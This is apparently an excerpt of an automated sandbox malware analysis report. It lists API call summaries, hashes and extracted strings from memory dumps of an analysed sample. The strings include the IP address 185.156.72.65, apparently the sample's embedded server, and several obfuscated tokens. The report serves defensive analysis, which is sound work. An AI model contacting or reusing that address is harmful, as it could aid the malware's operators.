                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: c4ba9752dcd84c22c44dd6542354d8036f89c1105082fda42e1d9e8fd5a27bc6
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: B1414872901209AFDF16CF98C980EEEBBB9BF88304F158169F914A7225D735A950DF50
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401084
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                      • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401194
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                      • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004012A4
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                      • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 0494150B
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction ID: 98aa35c248c7357362b975aeb6d892297c345811a15bf566927ec248ad7140a2
                      • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction Fuzzy Hash: 132126B0F002059EDB24EFB8E919BA97BB0FF85308F9041B9C4139B2A1D7757545CB59
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049412EB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049413FB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004084EE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407EEE
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: G@ZK$[@G_
                      • API String ID: 2296764815-2338778587
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948755
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948155
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00407899
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$A@K.
                      • API String ID: 2296764815-2457859030
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004079A9
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: @G@K$ZYA.
                      • API String ID: 2296764815-4236202813
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406E39
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: ZF\K$three
                      • API String ID: 2296764815-3094064056
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049470A0
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: ZF\K$three
                      • API String ID: 4132704954-3094064056
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947B00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$A@K.
                      • API String ID: 4132704954-2457859030
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04947C10
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: @G@K$ZYA.
                      • API String ID: 4132704954-4236202813
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00406C99
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: CGV.$mix
                      • API String ID: 2296764815-1644454629
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04946F00
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: CGV.$mix
                      • API String ID: 4132704954-1644454629